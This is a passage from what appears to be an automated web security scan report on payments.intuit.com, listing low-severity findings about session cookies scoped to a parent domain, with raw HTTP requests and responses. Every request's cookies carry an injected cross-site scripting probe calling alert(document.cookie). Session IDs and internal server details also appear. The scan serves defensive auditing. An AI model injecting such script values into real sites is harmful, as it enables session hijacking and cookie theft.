Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 16:53:54 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=o03uGIlQhAIMfOgApWkACw**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:30:55 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D9564B990A0805192AA117E3DCB47029
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=echecks_002dand_002dcheck_002dprocessing_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 145328


                                                                                                                                                                                                                                                                                                                                                                                                               
...[SNIP]...

2.15. http://payments.intuit.com/products/internet-merchant-accounts.jsp

Summary

Severity:   Low
Confidence:   Firm
Host:   http://payments.intuit.com
Path:   /products/internet-merchant-accounts.jsp

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /products/internet-merchant-accounts.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 16:53:33 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=1zfYWm-5+sIGHq3lVGsq9A**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:30:34 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D955F7F90A0805192AA117E30C252E9E
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=internet_002dmerchant_002daccounts_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 116256


                                                                                                                                                                                                                                                                                                                                                                                                                                   
...[SNIP]...

2.16. http://payments.intuit.com/products/online-credit-card-processing.jsp

Summary

Severity:   Low
Confidence:   Firm
Host:   http://payments.intuit.com
Path:   /products/online-credit-card-processing.jsp

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /products/online-credit-card-processing.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 16:53:31 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=ODpeSNk8Cz5OWAaU70Sg5Q**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:30:32 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D955F2B70A0805192AA117E38D1241DA
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=online_002dcredit_002dcard_002dprocessing_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 116043


                                                                                                                                                                                                                                                                                                                                                                                                                                   
...[SNIP]...

2.17. http://payments.intuit.com/products/quickbooks-credit-card-processing-services.jsp

Summary

Severity:   Low
Confidence:   Firm
Host:   http://payments.intuit.com
Path:   /products/quickbooks-credit-card-processing-services.jsp

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /products/quickbooks-credit-card-processing-services.jsp?scid=ips_pc90_banner HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 16:53:33 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=UO8K+W6L-Kr1FIobAgrNlQ**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:30:34 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D955FA3E0A0805192AA117E322CED842
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=quickbooks_002dcredit_002dcard_002dprocessing_002dservices_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 140253


                                                                                                                                                                                                                                                                                                                                                                                                                                   
...[SNIP]...

2.18. http://payments.intuit.com/products/quickbooks-payment-processing.jsp

Summary

Severity:   Low
Confidence:   Firm
Host:   http://payments.intuit.com
Path:   /products/quickbooks-payment-processing.jsp

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /products/quickbooks-payment-processing.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 16:53:33 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=-4lle2qf4zU7ZQFeZRXKaQ**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:30:34 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D955FA150A0805192AA117E3B9827F1E
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=quickbooks_002dpayment_002dprocessing_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 100416


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...

2.19. http://payments.intuit.com/products/quickbooks-payment-solutions/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://payments.intuit.com
Path:   /products/quickbooks-payment-solutions/

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /products/quickbooks-payment-solutions/ HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;

Response

HTTP/1.1 301 Moved Permanently
Date: Mon, 21 Mar 2011 16:53:13 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=fcbVblmcmlrYMQa1VP-PLQ**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:30:14 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D955A9AC0A0805192AA117E33BEA2C01
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=index_jsp&servletResponseTime=1&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Location: /products/quickbooks-payment-processing.jsp
Connection: close
Content-Length: 7
Vary: Accept-Encoding
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Content-Type: text/html;charset=ISO-8859-1


   

2.20. http://payments.intuit.com/products/quickbooks-payment-solutions/ach.jsp

Summary

Severity:   Low
Confidence:   Firm
Host:   http://payments.intuit.com
Path:   /products/quickbooks-payment-solutions/ach.jsp

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /products/quickbooks-payment-solutions/ach.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;

Response

HTTP/1.1 301 Moved Permanently
Date: Mon, 21 Mar 2011 16:53:16 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=N7D6qQirtSQ48MwkE5D6gA**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:30:17 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D955B4E80A0805192AA117E3B31762B5
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=ach_jsp&servletResponseTime=1&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Location: /products/echecks-and-check-processing.jsp
Connection: close
Content-Length: 15
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Content-Type: text/html;charset=ISO-8859-1


   

2.21. http://payments.intuit.com/products/quickbooks-payment-solutions/credit-card-processing-services.jsp

Summary

Severity:   Low
Confidence:   Firm
Host:   http://payments.intuit.com
Path:   /products/quickbooks-payment-solutions/credit-card-processing-services.jsp

Issue detail

The following cookies were issued by the application and are